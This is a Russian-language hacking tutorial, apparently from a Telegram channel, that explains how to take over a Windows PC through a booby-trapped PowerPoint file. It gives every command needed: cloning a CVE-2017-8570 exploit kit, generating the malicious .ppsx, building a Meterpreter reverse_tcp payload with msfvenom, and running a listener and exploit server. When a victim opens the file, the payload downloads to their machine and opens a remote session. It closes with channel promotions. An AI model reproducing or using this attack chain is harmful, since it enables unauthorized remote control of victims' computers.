Взлом ПК через презентацию

Продолжаем тему взлома через документы! В этот раз уже способ будет поинтереснее, тут нам понадобится Kali Linux и Metasploit.

Сперва загрузим сам эксплойт:

git clone https://github.com/tezukanice/Office8570.git

Переходим в его директорию:

cd Office8570 

Для успешной генерации ppsx файла, нужно создать папку template в директории Office8570:

mkdir template 

А нее переносим файл template.ppsx (он находится в папке, которую мы скачали):

cp template.ppsx template/

Далее нужно создать сам .ppsx файл

python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc 

Invoke.ppsx - имя презентации. Файл презентации мы сделали, но в него нужно вшить вирус. Создадим сам Payload (именно в директории /tmp/ это важно, просто не не меняйте команду):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /tmp/shell.exe 

Запускаем листенер. Он сообщает нам и получает управление, когда жертва открыла файл:

msfconsole -x «use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ВашАйпи; set LPORT 4444; run» 

Вирус и листенер готовы. Нужно запускать сам эксплоит-сервер:

python cve-2017-8570_toolkit.py -M exp -e http://ВашАйпи/shell.exe -l /tmp/shell.exe 

Кaк это работает: Когда жертва открывает презентацию, начнет скачиваться наш вирус, Когда загрузка вируса завершится, в кoнсoли откроется сессия и вы сможете управлять компьютером жертвы.

INVISIBLE - Юмор и мануалы по анонимности!

HIDDEN_PEOPLE - Самый анонимный чат в Telegram!